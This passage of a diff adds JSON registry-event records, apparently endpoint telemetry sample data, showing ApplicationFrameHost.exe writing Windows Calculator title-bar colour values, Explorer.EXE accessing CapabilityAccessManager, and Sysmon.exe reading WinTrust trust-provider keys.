"{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", + "registry_value": "ButtonBackgroundColorInactive", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", + "registry_value": "ButtonForegroundColorInactive", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", + "registry_value": "ButtonBackgroundColor", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", + "registry_value": "ButtonForegroundColor", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", + "registry_value": "ButtonHoverBackgroundColor", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", + "registry_value": "ButtonHoverForegroundColor", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", + "registry_value": "ButtonPressedBackgroundColor", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": 